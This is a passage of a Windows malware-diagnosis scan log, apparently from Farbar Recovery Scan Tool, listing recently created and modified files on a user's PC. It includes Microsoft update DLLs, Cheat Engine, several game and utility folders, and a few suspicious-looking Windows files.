2018-07-27 22:21 - 2018-07-26 11:31 - 000102523 _____ C:\Users\cheat\Desktop\Helpful Cheat Table 1.42 v2.5.0.CT
2018-07-27 22:17 - 2018-08-24 00:39 - 000000000 ____D C:\Program Files (x86)\Cheat Engine 6.8.1
2018-07-27 22:17 - 2018-07-27 22:17 - 000001172 _____ C:\Users\cheat\Desktop\Cheat Engine.lnk
2018-07-27 22:17 - 2018-07-27 22:17 - 000000000 ____D C:\Users\cheat\Documents\My Cheat Tables
2018-07-27 22:17 - 2018-07-27 22:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.8.1
2018-07-27 14:15 - 2018-08-19 12:37 - 000000203 _____ C:\Windows\R.exe
2018-07-27 14:15 - 2018-07-27 14:15 - 000003746 _____ C:\Windows\System32\Tasks\SystemSettings
2018-07-27 14:15 - 2018-07-27 14:15 - 000000007 _____ C:\Users\cheat\doc.txt
2018-07-25 14:14 - 2018-07-15 03:01 - 002266528 _____ (Microsoft Corporation) C:\Windows\system32\AppVEntSubsystems64.dll
2018-07-25 14:14 - 2018-07-15 03:00 - 000183736 _____ (Microsoft Corporation) C:\Windows\system32\mavinject.exe
2018-07-25 14:14 - 2018-07-15 02:58 - 000094112 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll
2018-07-25 14:14 - 2018-07-15 02:56 - 001523240 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2018-07-25 14:14 - 2018-07-15 02:44 - 006587392 _____ (Microsoft Corporation) C:\Windows\system32\twinui.dll
2018-07-25 14:14 - 2018-07-15 02:44 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\iemigplugin.dll
2018-07-25 14:14 - 2018-07-15 02:43 - 012710400 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2018-07-25 14:14 - 2018-07-15 02:42 - 008624128 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2018-07-25 14:14 - 2018-07-15 02:42 - 004708864 _____ (Microsoft Corporation) C:\Windows\system32\twinui.pcshell.dll
2018-07-25 14:14 - 2018-07-15 02:41 - 000169984 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.XamlHost.dll
2018-07-25 14:14 - 2018-07-15 02:41 - 000075264 _____ (Microsoft Corporation) C:\Windows\system32\ProvSysprep.dll
2018-07-25 14:14 - 2018-07-15 02:40 - 000727040 _____ C:\Windows\system32\hgattest.dll
2018-07-25 14:14 - 2018-07-15 02:39 - 001787392 _____ (Microsoft Corporation) C:\Windows\system32\wsp_health.dll
2018-07-25 14:14 - 2018-07-15 02:39 - 001605632 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2018-07-25 14:14 - 2018-07-15 02:38 - 002051584 _____ (Microsoft Corporation) C:\Windows\system32\wsp_fs.dll
2018-07-25 14:14 - 2018-07-15 02:38 - 001180160 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2018-07-25 14:14 - 2018-07-15 02:38 - 001004032 _____ (Microsoft Corporation) C:\Windows\system32\clusapi.dll
2018-07-25 14:14 - 2018-07-15 02:38 - 000615936 _____ (Microsoft Corporation) C:\Windows\system32\resutils.dll
2018-07-25 14:14 - 2018-07-15 02:38 - 000327168 _____ (Microsoft Corporation) C:\Windows\system32\rdpinit.exe
2018-07-25 14:14 - 2018-07-15 02:37 - 000463872 _____ (Microsoft Corporation) C:\Windows\system32\rdpshell.exe
2018-07-25 14:14 - 2018-07-15 02:36 - 000091136 _____ (Microsoft Corporation) C:\Windows\system32\mcbuilder.exe
2018-07-25 14:14 - 2018-07-15 01:31 - 001538968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppVEntSubsystems32.dll
2018-07-25 14:14 - 2018-07-15 01:31 - 000148888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mavinject.exe
2018-07-25 14:14 - 2018-07-15 01:28 - 001327424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll
2018-07-25 14:14 - 2018-07-15 01:18 - 005657600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.dll
2018-07-25 14:14 - 2018-07-15 01:17 - 011901440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2018-07-25 14:14 - 2018-07-15 01:15 - 007987712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2018-07-25 14:14 - 2018-07-15 01:14 - 000133632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.XamlHost.dll
2018-07-25 14:14 - 2018-07-15 01:13 - 001452544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsp_fs.dll
2018-07-25 14:14 - 2018-07-15 01:13 - 001308160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsp_health.dll
2018-07-25 14:14 - 2018-07-15 01:13 - 000775168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\clusapi.dll
2018-07-25 14:14 - 2018-07-15 01:13 - 000485376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\resutils.dll
2018-07-25 14:14 - 2018-07-15 01:11 - 000080384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mcbuilder.exe
2018-07-25 14:14 - 2018-07-14 08:46 - 023862784 _____ (Microsoft Corporation) C:\Windows\system32\Hydrogen.dll
2018-07-25 14:14 - 2018-07-14 08:42 - 019525632 _____ (Microsoft Corporation) C:\Windows\system32\HologramCompositor.dll
2018-07-25 14:14 - 2018-07-14 06:37 - 000375712 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\pci.sys
2018-07-25 14:14 - 2018-07-14 06:37 - 000230304 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tpm.sys
2018-07-25 14:14 - 2018-07-14 06:23 - 000760888 _____ (Microsoft Corporation) C:\Windows\system32\SecurityHealthService.exe
2018-07-25 14:14 - 2018-07-14 06:22 - 006813744 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.dll
2018-07-25 14:14 - 2018-07-14 06:22 - 001144664 _____ (Microsoft Corporation) C:\Windows\system32\mfnetcore.dll
2018-07-25 14:14 - 2018-07-14 06:22 - 000510392 _____ (Microsoft Corporation) C:\Windows\system32\policymanager.dll
2018-07-25 14:14 - 2018-07-14 06:22 - 000203560 _____ (Microsoft Corporation) C:\Windows\system32\rsaenh.dll
2018-07-25 14:14 - 2018-07-14 06:21 - 000722824 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2018-07-25 14:14 - 2018-07-14 06:21 - 000192920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2018-07-25 14:14 - 2018-07-14 06:20 - 000184472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rsaenh.dll
2018-07-25 14:14 - 2018-07-14 06:19 - 002535032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmp4srcsnk.dll
2018-07-25 14:14 - 2018-07-14 06:19 - 001946752 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2018-07-25 14:14 - 2018-07-14 06:19 - 000981920 _____ (Microsoft Corporation) C:\Windows\system32\LicenseManager.dll
2018-07-25 14:14 - 2018-07-14 06:19 - 000636944 _____ (Microsoft Corporation) C:\Windows\system32\services.exe
2018-07-25 14:14 - 2018-07-14 06:19 - 000483024 _____ (Microsoft Corporation) C:\Windows\system32\ucrtbase_enclave.dll
2018-07-25 14:14 - 2018-07-14 06:18 - 002563984 _____ (Microsoft Corporation) C:\Windows\system32\mfmp4srcsnk.dll
2018-07-25 14:14 - 2018-07-14 06:18 - 002371416 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2018-07-25 14:14 - 2018-07-14 06:18 - 001017584 _____ (Microsoft Corporation) C:\Windows\system32\ucrtbase.dll
2018-07-25 14:14 - 2018-07-14 06:18 - 000930712 _____ (Microsoft Corporation) C:\Windows\system32\WWAHost.exe
2018-07-25 14:14 - 2018-07-14 06:18 - 000613176 _____ (Microsoft Corporation) C:\Windows\system32\TextInputFramework.dll
2018-07-25 14:14 - 2018-07-14 06:18 - 000443216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\policymanager.dll
2018-07-25 14:14 - 2018-07-14 06:18 - 000376216 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fastfat.sys
2018-07-25 14:14 - 2018-07-14 06:17 - 006527056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.dll
2018-07-25 14:14 - 2018-07-14 06:17 - 002420632 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
2018-07-25 14:14 - 2018-07-14 06:17 - 000743320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LicenseManager.dll
2018-07-25 14:14 - 2018-07-14 06:16 - 002331576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msmpeg2vdec.dll
2018-07-25 14:14 - 2018-07-14 06:16 - 001143096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfnetcore.dll
2018-07-25 14:14 - 2018-07-14 06:16 - 000506728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TextInputFramework.dll
2018-07-25 14:14 - 2018-07-14 06:15 - 001559368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2018-07-25 14:14 - 2018-07-14 06:15 - 001174552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ucrtbase.dll
2018-07-25 14:14 - 2018-07-14 06:15 - 000829856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WWAHost.exe
2018-07-25 14:14 - 2018-07-14 06:01 - 006647296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\BingMaps.dll
2018-07-25 14:14 - 2018-07-14 05:59 - 009084928 _____ (Microsoft Corporation) C:\Windows\system32\BingMaps.dll
2018-07-25 14:14 - 2018-07-14 05:59 - 005883392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mos.dll
2018-07-25 14:14 - 2018-07-14 05:59 - 003553280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InputService.dll
2018-07-25 14:14 - 2018-07-14 05:58 - 000172544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\enrollmentapi.dll
2018-07-25 14:14 - 2018-07-14 05:58 - 000094720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataTimeUtil.dll
2018-07-25 14:14 - 2018-07-14 05:58 - 000002560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2018-07-25 14:14 - 2018-07-14 05:57 - 007057920 _____ (Microsoft Corporation) C:\Windows\system32\mos.dll
2018-07-25 14:14 - 2018-07-14 05:57 - 004331008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFMediaEngine.dll
2018-07-25 14:14 - 2018-07-14 05:57 - 001295360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSVPXENC.dll
2018-07-25 14:14 - 2018-07-14 05:57 - 000391168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\daxexec.dll
2018-07-25 14:14 - 2018-07-14 05:56 - 004559872 _____ (Microsoft Corporation) C:\Windows\system32\MFMediaEngine.dll
2018-07-25 14:14 - 2018-07-14 05:56 - 002900992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dwmcore.dll
2018-07-25 14:14 - 2018-07-14 05:56 - 002697216 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.Controls.dll
2018-07-25 14:14 - 2018-07-14 05:56 - 002449408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MapRouter.dll
2018-07-25 14:14 - 2018-07-14 05:56 - 001986560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MapGeocoder.dll
2018-07-25 14:14 - 2018-07-14 05:56 - 001703936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Xaml.Controls.dll
2018-07-25 14:14 - 2018-07-14 05:56 - 001558016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpserverbase.dll
2018-07-25 14:14 - 2018-07-14 05:56 - 000392704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MapConfiguration.dll
2018-07-25 14:14 - 2018-07-14 05:56 - 000365568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpencom.dll
2018-07-25 14:14 - 2018-07-14 05:56 - 000257536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WiFiDisplay.dll
2018-07-25 14:14 - 2018-07-14 05:56 - 000118784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\raschap.dll
2018-07-25 14:14 - 2018-07-14 05:56 - 000093184 _____ (Microsoft Corporation) C:\Windows\system32\nvspinfo.exe
2018-07-25 14:14 - 2018-07-14 05:56 - 000073728 _____ (Microsoft Corporation) C:\Windows\system32\WFDSConMgr.dll
2018-07-25 14:14 - 2018-07-14 05:56 - 000023040 _____ C:\Windows\system32\hnsproxy.dll
2018-07-25 14:14 - 2018-07-14 05:55 - 001627136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2018-07-25 14:14 - 2018-07-14 05:55 - 001124352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cdprt.dll
2018-07-25 14:14 - 2018-07-14 05:55 - 000993792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Networking.Vpn.dll
2018-07-25 14:14 - 2018-07-14 05:55 - 000582144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Core.TextInput.dll
2018-07-25 14:14 - 2018-07-14 05:55 - 000458752 _____ (Microsoft Corporation) C:\Windows\system32\cloudAP.dll
2018-07-25 14:14 - 2018-07-14 05:55 - 000414720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cldflt.sys
2018-07-25 14:14 - 2018-07-14 05:55 - 000344576 _____ (Microsoft Corporation) C:\Windows\system32\RasMediaManager.dll
2018-07-25 14:14 - 2018-07-14 05:55 - 000317440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dhcpcore.dll
2018-07-25 14:14 - 2018-07-14 05:55 - 000282624 _____ (Microsoft Corporation) C:\Windows\system32\provops.dll
2018-07-25 14:14 - 2018-07-14 05:55 - 000227840 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\winnat.sys
2018-07-25 14:14 - 2018-07-14 05:55 - 000227328 _____ (Microsoft Corporation) C:\Windows\system32\PrivateCloudHNSPlugin.dll
2018-07-25 14:14 - 2018-07-14 05:55 - 000208384 _____ (Microsoft Corporation) C:\Windows\system32\provisioningcsp.dll
2018-07-25 14:14 - 2018-07-14 05:55 - 000205312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\OneCoreCommonProxyStub.dll
2018-07-25 14:14 - 2018-07-14 05:55 - 000204288 _____ (Microsoft Corporation) C:\Windows\system32\enrollmentapi.dll
2018-07-25 14:14 - 2018-07-14 05:55 - 000185856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mdmregistration.dll
2018-07-25 14:14 - 2018-07-14 05:55 - 000147456 _____ (Microsoft Corporation) C:\Windows\system32\datamarketsvc.dll
2018-07-25 14:14 - 2018-07-14 05:55 - 000119296 _____ (Microsoft Corporation) C:\Windows\system32\UserDataTimeUtil.dll
2018-07-25 14:14 - 2018-07-14 05:55 - 000062976 _____ (Microsoft Corporation) C:\Windows\system32\EASPolicyManagerBrokerHost.exe
2018-07-25 14:14 - 2018-07-14 05:55 - 000002560 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2018-07-25 14:14 - 2018-07-14 05:54 - 003319808 _____ (Microsoft Corporation) C:\Windows\system32\dwmcore.dll
2018-07-25 14:14 - 2018-07-14 05:54 - 002825728 _____ (Microsoft Corporation) C:\Windows\system32\MapGeocoder.dll
2018-07-25 14:14 - 2018-07-14 05:54 - 001627136 _____ (Microsoft Corporation) C:\Windows\system32\enterprisecsps.dll
2018-07-25 14:14 - 2018-07-14 05:54 - 001537024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ActiveSyncProvider.dll
2018-07-25 14:14 - 2018-07-14 05:54 - 001307648 _____ (Microsoft Corporation) C:\Windows\system32\MSVPXENC.dll
2018-07-25 14:14 - 2018-07-14 05:54 - 000898560 _____ (Microsoft Corporation) C:\Windows\system32\MusUpdateHandlers.dll
2018-07-25 14:14 - 2018-07-14 05:54 - 000729088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NMAA.dll
2018-07-25 14:14 - 2018-07-14 05:54 - 000603648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PCPKsp.dll
2018-07-25 14:14 - 2018-07-14 05:54 - 000530432 _____ (Microsoft Corporation) C:\Windows\system32\MapConfiguration.dll
2018-07-25 14:14 - 2018-07-14 05:54 - 000444416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dmenrollengine.dll
2018-07-25 14:14 - 2018-07-14 05:54 - 000409088 _____ (Microsoft Corporation) C:\Windows\system32\rdpencom.dll
2018-07-25 14:14 - 2018-07-14 05:54 - 000392192 _____ (Microsoft Corporation) C:\Windows\system32\provengine.dll
2018-07-25 14:14 - 2018-07-14 05:54 - 000358400 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\exfat.sys
2018-07-25 14:14 - 2018-07-14 05:54 - 000352768 _____ (Microsoft Corporation) C:\Windows\system32\dhcpcore.dll
2018-07-25 14:14 - 2018-07-14 05:54 - 000262144 _____ (Microsoft Corporation) C:\Windows\system32\PushToInstall.dll
2018-07-25 14:14 - 2018-07-14 05:54 - 000137728 _____ (Microsoft Corporation) C:\Windows\system32\raschap.dll
2018-07-25 14:14 - 2018-07-14 05:54 - 000014336 _____ (Microsoft Corporation) C:\Windows\system32\EasPolicyManagerBrokerPS.dll
2018-07-25 14:14 - 2018-07-14 05:53 - 004770816 _____ (Microsoft Corporation) C:\Windows\system32\InputService.dll
2018-07-25 14:14 - 2018-07-14 05:53 - 003381248 _____ (Microsoft Corporation) C:\Windows\system32\MapRouter.dll
2018-07-25 14:14 - 2018-07-14 05:53 - 002368512 _____ (Microsoft Corporation) C:\Windows\system32\WebRuntimeManager.dll
2018-07-25 14:14 - 2018-07-14 05:53 - 001825792 _____ (Microsoft Corporation) C:\Windows\system32\Windows.CloudStore.dll
2018-07-25 14:14 - 2018-07-14 05:53 - 001668096 _____ (Microsoft Corporation) C:\Windows\system32\cdprt.dll
2018-07-25 14:14 - 2018-07-14 05:53 - 000713216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\BingOnlineServices.dll
2018-07-25 14:14 - 2018-07-14 05:53 - 000705024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MapControlCore.dll
2018-07-25 14:14 - 2018-07-14 05:53 - 000681984 _____ (Microsoft Corporation) C:\Windows\system32\WFDSConMgrSvc.dll
2018-07-25 14:14 - 2018-07-14 05:53 - 000566272 _____ (Microsoft Corporation) C:\Windows\system32\daxexec.dll
2018-07-25 14:14 - 2018-07-14 05:53 - 000450560 _____ (Microsoft Corporation) C:\Windows\system32\OneCoreCommonProxyStub.dll
2018-07-25 14:14 - 2018-07-14 05:53 - 000396800 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2018-07-25 14:14 - 2018-07-14 05:53 - 000220160 _____ (Microsoft Corporation) C:\Windows\system32\mdmregistration.dll
2018-07-25 14:14 - 2018-07-14 05:52 - 001709056 _____ (Microsoft Corporation) C:\Windows\system32\HostNetSvc.dll
2018-07-25 14:14 - 2018-07-14 05:52 - 000972800 _____ (Microsoft Corporation) C:\Windows\system32\sysmain.dll
2018-07-25 14:14 - 2018-07-14 05:52 - 000790528 _____ (Microsoft Corporation) C:\Windows\system32\PCPKsp.dll
2018-07-25 14:14 - 2018-07-14 05:52 - 000755712 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Core.TextInput.dll
2018-07-25 14:14 - 2018-07-14 05:52 - 000506880 _____ (Microsoft Corporation) C:\Windows\system32\netprofmsvc.dll
2018-07-25 14:14 - 2018-07-14 05:52 - 000311296 _____ (Microsoft Corporation) C:\Windows\system32\WiFiDisplay.dll
2018-07-25 14:14 - 2018-07-14 05:51 - 003376640 _____ (Microsoft Corporation) C:\Windows\system32\NetworkMobileSettings.dll
2018-07-25 14:14 - 2018-07-14 05:51 - 002904576 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2018-07-25 14:14 - 2018-07-14 05:51 - 001804288 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2018-07-25 14:14 - 2018-07-14 05:51 - 001747968 _____ (Microsoft Corporation) C:\Windows\system32\rdpserverbase.dll
2018-07-25 14:14 - 2018-07-14 05:51 - 001304064 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Networking.Vpn.dll
2018-07-25 14:14 - 2018-07-14 05:51 - 000491520 _____ (Microsoft Corporation) C:\Windows\system32\defragsvc.dll
2018-07-25 14:14 - 2018-07-14 05:51 - 000466432 _____ (Microsoft Corporation) C:\Windows\system32\wuuhext.dll
2018-07-25 14:14 - 2018-07-14 05:50 - 001773056 _____ (Microsoft Corporation) C:\Windows\system32\ActiveSyncProvider.dll
2018-07-25 14:14 - 2018-07-14 05:50 - 001457664 _____ (Microsoft Corporation) C:\Windows\system32\dosvc.dll
2018-07-25 14:14 - 2018-07-14 05:50 - 001359360 _____ (Microsoft Corporation) C:\Windows\system32\lpasvc.dll
2018-07-25 14:14 - 2018-07-14 05:50 - 001225216 _____ (Microsoft Corporation) C:\Windows\system32\MapsStore.dll
2018-07-25 14:14 - 2018-07-14 05:50 - 000949760 _____ (Microsoft Corporation) C:\Windows\system32\wcmsvc.dll
2018-07-25 14:14 - 2018-07-14 05:50 - 000943616 _____ (Microsoft Corporation) C:\Windows\system32\BingOnlineServices.dll
2018-07-25 14:14 - 2018-07-14 05:50 - 000932352 _____ (Microsoft Corporation) C:\Windows\system32\rasmans.dll
2018-07-25 14:14 - 2018-07-14 05:50 - 000884224 _____ (Microsoft Corporation) C:\Windows\system32\NMAA.dll
2018-07-25 14:14 - 2018-07-14 05:50 - 000522752 _____ (Microsoft Corporation) C:\Windows\system32\dmenrollengine.dll
2018-07-25 14:14 - 2018-07-14 05:50 - 000401920 _____ (Microsoft Corporation) C:\Windows\system32\rascustom.dll
2018-07-25 14:14 - 2018-07-14 05:49 - 001069568 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bthport.sys
2018-07-25 14:14 - 2018-07-14 05:49 - 000884736 _____ (Microsoft Corporation) C:\Windows\system32\MapControlCore.dll

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-08-24 21:34 - 2018-06-22 13:45 - 000000005 _____ C:\Windows\proc.txt
2018-08-24 21:33 - 2018-04-12 01:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2018-08-24 21:13 - 2018-06-02 23:43 - 000000000 _____ C:\Windows\Path.idx
2018-08-24 21:11 - 2018-06-02 23:13 - 001689054 _____ C:\Windows\system32\PerfStringBackup.INI
2018-08-24 21:11 - 2018-04-12 17:51 - 000715202 _____ C:\Windows\system32\perfh005.dat
2018-08-24 21:11 - 2018-04-12 17:51 - 000144496 _____ C:\Windows\system32\perfc005.dat
2018-08-24 21:11 - 2018-04-12 01:36 - 000000000 ____D C:\Windows\INF
2018-08-24 21:07 - 2018-06-02 23:36 - 001048576 _____ C:\Windows\PE_Rom.dll
2018-08-24 21:07 - 2018-06-02 23:11 - 000000000 ____D C:\ProgramData\NVIDIA
2018-08-24 21:06 - 2018-07-03 00:33 - 000000000 ____D C:\Users\cheat\AppData\Roaming\Spotify
2018-08-24 21:06 - 2018-07-03 00:33 - 000000000 ____D C:\Users\cheat\AppData\Local\Spotify
2018-08-24 21:06 - 2018-06-02 23:37 - 000003094 _____ C:\Windows\System32\Tasks\GPU Tweak II
2018-08-24 21:06 - 2018-06-02 23:26 - 000000000 ____D C:\Program Files (x86)\Steam
2018-08-24 21:05 - 2018-06-17 22:35 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2018-08-24 21:05 - 2018-06-09 17:17 - 000000515 _____ C:\Windows\system32\Drivers\etc\hosts.ics
2018-08-24 21:05 - 2018-06-03 22:40 - 000001134 _____ C:\Windows\system32\config\VSMIDK
2018-08-24 21:05 - 2018-06-02 23:20 - 000000000 ____D C:\Users\cheat\AppData\Roaming\DMCache
2018-08-24 21:05 - 2018-06-02 23:05 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-08-24 21:05 - 2018-06-02 23:05 - 000000000 ____D C:\Windows\system32\SleepStudy
2018-08-24 20:26 - 2018-06-09 17:18 - 000004212 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{9EA51114-8B2F-4D30-9AF0-5301C2A4D37D}
2018-08-24 00:39 - 2018-06-17 20:26 - 000000000 ____D C:\Program Files (x86)\Kingo ROOT
2018-08-24 00:39 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\AppReadiness
2018-08-24 00:04 - 2018-04-12 01:38 - 000000000 ___HD C:\Program Files\WindowsApps
2018-08-23 22:38 - 2018-06-02 23:36 - 000000000 ____D C:\Users\cheat\AppData\Local\CrashDumps
2018-08-23 22:33 - 2018-06-03 00:17 - 000000000 ____D C:\Users\cheat\AppData\Roaming\vlc
2018-08-23 20:17 - 2018-06-03 01:37 - 000000000 ____D C:\Users\cheat\Documents\ShareX
2018-08-23 01:33 - 2018-04-11 23:04 - 000524288 _____ C:\Windows\system32\config\BBI
2018-08-21 21:22 - 2018-06-02 23:20 - 000000000 ____D C:\Users\cheat\AppData\Roaming\IDM
2018-08-21 21:03 - 2018-06-17 00:43 - 000000000 ____D C:\Users\cheat\AppData\Local\4kdownload.com
2018-08-20 14:19 - 2018-06-03 00:16 - 000000000 ____D C:\Users\cheat\AppData\Local\D3DSCache
2018-08-19 19:16 - 2018-06-02 23:23 - 000000000 ____D C:\Users\cheat\AppData\Local\GHISLER
2018-08-19 18:19 - 2018-06-03 02:05 - 000000000 ____D C:\ProgramData\Malwarebytes
2018-08-19 16:14 - 2018-06-02 23:09 - 000000000 ____D C:\Users\cheat
2018-08-19 13:25 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\LiveKernelReports
2018-08-18 21:14 - 2018-06-09 14:34 - 000000000 ____D C:\Users\cheat\.VirtualBox
2018-08-15 12:24 - 2018-06-02 23:10 - 000000000 __RHD C:\Users\Public\AccountPictures
2018-08-15 12:24 - 2018-06-02 23:10 - 000000000 ___RD C:\Users\cheat\3D Objects
2018-08-15 12:23 - 2018-06-02 23:05 - 000242960 _____ C:\Windows\system32\FNTCACHE.DAT
2018-08-15 01:41 - 2018-06-09 17:17 - 000000000 ____D C:\Program Files\Hyper-V
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\SysWOW64\zu-ZA
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\SysWOW64\yo-NG
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\SysWOW64\xh-ZA
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\SysWOW64\wo-SN
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\SysWOW64\uz-Latn-UZ
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\SysWOW64\tn-ZA
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\SysWOW64\ti-ET
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\SysWOW64\tg-Cyrl-TJ
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\SysWOW64\sr-Cyrl-RS
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\SysWOW64\sr-Cyrl-BA
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\SysWOW64\sd-Arab-PK
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\SysWOW64\rw-RW
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\SysWOW64\quc-Latn-GT
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\SysWOW64\pa-Arab-PK
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\SysWOW64\nso-ZA
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\SysWOW64\ku-Arab-IQ
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\SysWOW64\ig-NG
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\SysWOW64\chr-CHER-US
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\SysWOW64\ha-Latn-NG
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\SysWOW64\ca-ES-valencia
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\SysWOW64\bs-Latn-BA
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\SysWOW64\az-Latn-AZ
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\zu-ZA
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\yo-NG
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\xh-ZA
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\wo-SN
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\uz-Latn-UZ
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\tn-ZA
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\ti-ET
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\tg-Cyrl-TJ
